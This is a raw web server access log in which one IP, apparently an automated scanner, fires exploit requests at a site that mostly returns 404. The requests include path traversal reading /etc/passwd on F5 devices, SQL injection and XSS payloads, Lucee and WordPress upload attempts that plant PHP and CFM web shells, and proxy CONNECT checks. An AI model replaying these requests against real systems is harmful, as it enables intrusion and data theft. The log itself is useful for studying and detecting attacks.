205.185.122.202 - - [19/Oct/2025:16:00:28 +0530] "POST /auth/check HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:16:00:28 +0530] "POST /auth/check HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:16:00:31 +0530] "POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:16:00:31 +0530] "POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:16:00:35 +0530] "POST /auth/newpassword HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:16:00:36 +0530] "POST /auth/newpassword HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:16:00:54 +0530] "POST /auth/requestreset HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:16:00:55 +0530] "POST /auth/requestreset HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:16:00:59 +0530] "POST /auth/requestreset HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:16:01:00 +0530] "POST /auth/requestreset HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:16:01:11 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:01:11 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:01:19 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:01:19 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:01:27 +0530] "GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:16:01:27 +0530] "GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:16:01:31 +0530] "GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1" 404 1136
205.185.122.202 - - [19/Oct/2025:16:01:31 +0530] "GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1" 404 1136
205.185.122.202 - - [19/Oct/2025:16:01:49 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:01:49 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:03:29 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:03:31 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:03:45 +0530] "GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:16:03:45 +0530] "GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:16:04:18 +0530] "GET /wp-admin/admin-post.php?do_reset_wordpress=1 HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:04:19 +0530] "GET /wp-admin/admin-post.php?do_reset_wordpress=1 HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:04:24 +0530] "GET /register/ HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:04:24 +0530] "GET /register/ HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:05:00 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:05:00 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:05:07 +0530] "GET /wp-content/themes/15zine/readme.txt HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:16:05:07 +0530] "GET /wp-content/themes/15zine/readme.txt HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:16:05:13 +0530] "POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:05:15 +0530] "POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1" 404 1040
176.97.210.9 - - [19/Oct/2025:16:05:37 +0530] "CONNECT api.my-ip.io:443 HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:16:06:12 +0530] "POST /wp-admin/admin-ajax.php?action=_ning_upload_image HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:06:12 +0530] "POST /wp-admin/admin-ajax.php?action=_ning_upload_image HTTP/1.1" 404 1040
176.97.210.9 - - [19/Oct/2025:16:06:52 +0530] "CONNECT httpbin.org:443 HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:16:06:57 +0530] "GET /wp-content/plugins/wp-fastest-cache/ HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:16:06:57 +0530] "GET /wp-content/plugins/wp-fastest-cache/ HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:16:06:58 +0530] "POST /os/mxperson HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:16:06:58 +0530] "POST /os/mxperson HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:16:07:03 +0530] "POST /meaweb/os/mxperson HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:07:03 +0530] "POST /meaweb/os/mxperson HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:07:43 +0530] "POST /dfsms/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:16:07:43 +0530] "POST /dfsms/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:16:07:53 +0530] "GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:16:07:54 +0530] "GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:16:08:13 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:08:13 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:08:21 +0530] "POST /magmi/web/magmi_saveprofile.php HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:16:08:22 +0530] "POST /magmi/web/magmi_saveprofile.php HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:16:08:26 +0530] "POST /magmi/web/magmi_run.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:08:26 +0530] "POST /magmi/web/magmi_run.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:08:30 +0530] "GET /magmi/web/info.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:08:30 +0530] "GET /magmi/web/info.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:09:06 +0530] "POST /EemAdminService/EemAdmin HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:16:09:06 +0530] "POST /EemAdminService/EemAdmin HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:16:09:20 +0530] "POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:16:09:20 +0530] "POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:16:10:05 +0530] "POST /session/create HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:16:10:06 +0530] "POST /session/create HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:16:10:07 +0530] "GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:16:10:07 +0530] "GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:16:10:11 +0530] "POST /account/index.php HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:16:10:11 +0530] "POST /account/index.php HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:16:10:11 +0530] "GET /wp-content/plugins/ultimate-faqs/readme.txt HTTP/1.1" 404 1080
205.185.122.202 - - [19/Oct/2025:16:10:11 +0530] "GET /wp-content/plugins/ultimate-faqs/readme.txt HTTP/1.1" 404 1080
205.185.122.202 - - [19/Oct/2025:16:10:13 +0530] "POST /opensis/index.php HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:16:10:13 +0530] "POST /opensis/index.php HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:16:10:16 +0530] "POST /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:10:16 +0530] "POST /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:10:32 +0530] "POST /api/jsonws/invoke HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:16:10:33 +0530] "POST /api/jsonws/invoke HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:16:10:33 +0530] "POST /api/jsonws/invoke HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:16:10:33 +0530] "POST /api/jsonws/invoke HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:16:10:33 +0530] "POST /cgi-bin/libagent.cgi?type=J HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:16:10:33 +0530] "POST /cgi-bin/libagent.cgi?type=J HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:16:10:45 +0530] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:16:10:45 +0530] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:16:10:47 +0530] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:16:10:48 +0530] "POST /menu/stapp HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:16:10:48 +0530] "POST /menu/stapp HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:16:10:48 +0530] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:16:10:50 +0530] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:16:10:51 +0530] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:16:10:52 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:16:10:52 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:16:10:53 +0530] "GET /hsqldb%0a HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:10:54 +0530] "GET /hsqldb%0a HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:10:57 +0530] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:16:10:59 +0530] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:16:11:00 +0530] "POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:16:11:02 +0530] "POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:16:11:03 +0530] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:16:11:04 +0530] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:16:11:05 +0530] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:16:11:07 +0530] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:16:11:08 +0530] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:16:11:08 +0530] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:16:11:39 +0530] "POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:11:40 +0530] "POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:11:41 +0530] "GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:16:11:43 +0530] "GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:16:11:44 +0530] "GET /menu/neo HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:16:11:45 +0530] "GET /menu/neo HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:16:11:48 +0530] "GET /menu/stc HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:16:11:48 +0530] "GET /menu/stc HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:16:12:05 +0530] "GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:12:05 +0530] "GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:12:08 +0530] "POST /eonapi/createEonUser?username=admin&apiKey=8931d2811f20597413301b9d32cfd5a811071d64d2d7a0aec19e54fe98439325 HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:16:12:08 +0530] "POST /eonapi/createEonUser?username=admin&apiKey=1becd27a5c5027b27a10bd9f3aeeb9faece7549eb52dd436b8210b3fc8c1b09c HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:16:12:20 +0530] "GET /eonapi/getApiKey?username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:16:12:21 +0530] "GET /eonapi/getApiKey?username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:16:12:23 +0530] "GET /eonapi/getApiKey?username=%27%20union%20select%20sleep(6),0,0,0,0,0,0,0%20or%20%27 HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:16:12:24 +0530] "GET /eonapi/getApiKey?username=%27%20union%20select%20sleep(6),0,0,0,0,0,0,0%20or%20%27 HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:16:12:26 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:12:26 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:12:28 +0530] "GET /wp-admin/index.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:12:29 +0530] "GET /wp-admin/index.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:13:02 +0530] "GET /?author=1 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:13:03 +0530] "GET /?author=1 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:13:05 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:13:06 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:14:19 +0530] "POST /webtools/control/xmlrpc HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:14:20 +0530] "POST /webtools/control/xmlrpc HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:14:22 +0530] "POST /graphql HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:16:14:23 +0530] "POST /graphql HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:16:15:18 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:15:18 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:15:20 +0530] "POST /upload HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:16:15:20 +0530] "POST /upload HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:16:15:41 +0530] "GET /images/..%2finfo.html HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:16:15:41 +0530] "GET /images/..%2finfo.html HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:16:15:55 +0530] "GET /images/..%2finfo.html HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:16:15:55 +0530] "GET /images/..%2finfo.html HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:16:16:02 +0530] "GET /images/..%2finfo.html HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:16:16:04 +0530] "GET /images/..%2finfo.html HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:16:16:04 +0530] "POST /apply_sec.cgi HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:16:05 +0530] "POST /apply_sec.cgi HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:16:05 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:16:16:07 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:16:16:23 +0530] "POST /apply_sec.cgi HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:16:24 +0530] "POST /apply_sec.cgi HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:16:26 +0530] "POST /apply_sec.cgi HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:16:28 +0530] "POST /apply_sec.cgi HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:17:29 +0530] "POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:16:17:29 +0530] "POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:16:17:30 +0530] "POST /minio/webrpc HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:16:17:30 +0530] "POST /minio/webrpc HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:16:17:33 +0530] "POST /auth/realms/master/clients-registrations/default HTTP/1.1" 404 1090
205.185.122.202 - - [19/Oct/2025:16:17:33 +0530] "POST /auth/realms/master/clients-registrations/default HTTP/1.1" 404 1090
205.185.122.202 - - [19/Oct/2025:16:17:36 +0530] "POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1" 404 1104
205.185.122.202 - - [19/Oct/2025:16:17:37 +0530] "POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1" 404 1104
205.185.122.202 - - [19/Oct/2025:16:17:39 +0530] "POST /realms/master/clients-registrations/default HTTP/1.1" 404 1080
205.185.122.202 - - [19/Oct/2025:16:17:40 +0530] "POST /realms/master/clients-registrations/default HTTP/1.1" 404 1080
205.185.122.202 - - [19/Oct/2025:16:17:42 +0530] "POST /realms/master/clients-registrations/openid-connect HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:16:17:44 +0530] "POST /realms/master/clients-registrations/openid-connect HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:16:18:04 +0530] "POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:16:18:05 +0530] "POST /_adminer/index.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:18:05 +0530] "POST /adminer/index.php HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:16:18:05 +0530] "POST /_adminer.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:16:18:05 +0530] "POST /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:18:05 +0530] "POST /_adminer/index.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:18:05 +0530] "POST /adminer.php HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:16:18:05 +0530] "POST /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:18:05 +0530] "POST /_adminer.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:16:18:05 +0530] "POST /adminer/adminer.php HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:16:18:05 +0530] "POST /adminer/adminer.php HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:16:18:05 +0530] "POST /adminer.php HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:16:18:05 +0530] "POST /adminer/index.php HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:16:18:05 +0530] "POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:16:18:09 +0530] "POST /lucee/admin/imgProcess.cfm?file=/../../../context/34HFS1zkCFv3vB8d4hOQlYz1wJO.cfm HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:16:18:09 +0530] "POST /lucee/admin/imgProcess.cfm?file=/../../../context/34HFS1zkCFv3vB8d4hOQlYz1wJO.cfm HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:16:18:13 +0530] "POST /lucee/34HFS1zkCFv3vB8d4hOQlYz1wJO.cfm HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:16:18:13 +0530] "POST /lucee/34HFS1zkCFv3vB8d4hOQlYz1wJO.cfm HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:16:18:48 +0530] "POST /wp-json/buddypress/v1/signup HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:16:18:48 +0530] "POST /wp-json/buddypress/v1/signup HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:16:18:57 +0530] "GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:16:18:58 +0530] "GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:16:19:31 +0530] "POST /casa/nodes/thumbprints HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:16:19:31 +0530] "POST /casa/nodes/thumbprints HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:16:20:08 +0530] "POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:20:09 +0530] "POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:20:27 +0530] "POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1" 404 1234
205.185.122.202 - - [19/Oct/2025:16:20:27 +0530] "POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1" 404 1234
205.185.122.202 - - [19/Oct/2025:16:20:45 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:20:46 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:20:46 +0530] "POST /_bulk HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:16:20:47 +0530] "POST /_bulk HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:16:20:49 +0530] "POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:16:20:50 +0530] "POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:16:20:57 +0530] "POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:16:20:57 +0530] "POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:16:21:23 +0530] "GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:16:21:23 +0530] "GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:16:21:48 +0530] "POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:16:21:49 +0530] "POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:16:22:18 +0530] "POST /mgmt/shared/authn/login HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:22:18 +0530] "POST /mgmt/shared/authn/login HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:22:41 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:16:22:41 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:16:23:18 +0530] "GET /wp-content/plugins/daggerhart-openid-connect-generic/readme.txt HTTP/1.1" 404 1120
205.185.122.202 - - [19/Oct/2025:16:23:18 +0530] "GET /wp-content/plugins/daggerhart-openid-connect-generic/readme.txt HTTP/1.1" 404 1120
205.185.122.202 - - [19/Oct/2025:16:23:47 +0530] "POST /wp-json/td/v1/optin/subscription HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:16:23:47 +0530] "POST /wp-json/td/v1/optin/subscription HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:16:24:12 +0530] "POST /wp-comments-post.php HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:16:24:12 +0530] "POST /wp-comments-post.php HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:16:24:14 +0530] "GET /wp-content/plugins/imagements/images/34hfs89nwro5fqjfoyiiaiwlmkv.php HTTP/1.1" 404 1130
205.185.122.202 - - [19/Oct/2025:16:24:15 +0530] "GET /wp-content/plugins/imagements/images/34hfs89nwro5fqjfoyiiaiwlmkv.php HTTP/1.1" 404 1130
205.185.122.202 - - [19/Oct/2025:16:24:21 +0530] "GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:16:24:22 +0530] "GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:16:24:23 +0530] "GET /wp-content/plugins/stop-spammer-registrations-plugin/readme.txt HTTP/1.1" 404 1120
205.185.122.202 - - [19/Oct/2025:16:24:24 +0530] "GET /wp-content/plugins/stop-spammer-registrations-plugin/readme.txt HTTP/1.1" 404 1120
205.185.122.202 - - [19/Oct/2025:16:24:49 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:24:49 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:24:59 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:25:01 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:25:32 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:25:32 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:25:40 +0530] "POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:25:41 +0530] "POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:25:43 +0530] "GET /wp-content/uploads/kaswara/fonts_icon/sjdncx/ur.php HTTP/1.1" 404 1096
205.185.122.202 - - [19/Oct/2025:16:25:44 +0530] "GET /wp-content/uploads/kaswara/fonts_icon/sjdncx/ur.php HTTP/1.1" 404 1096
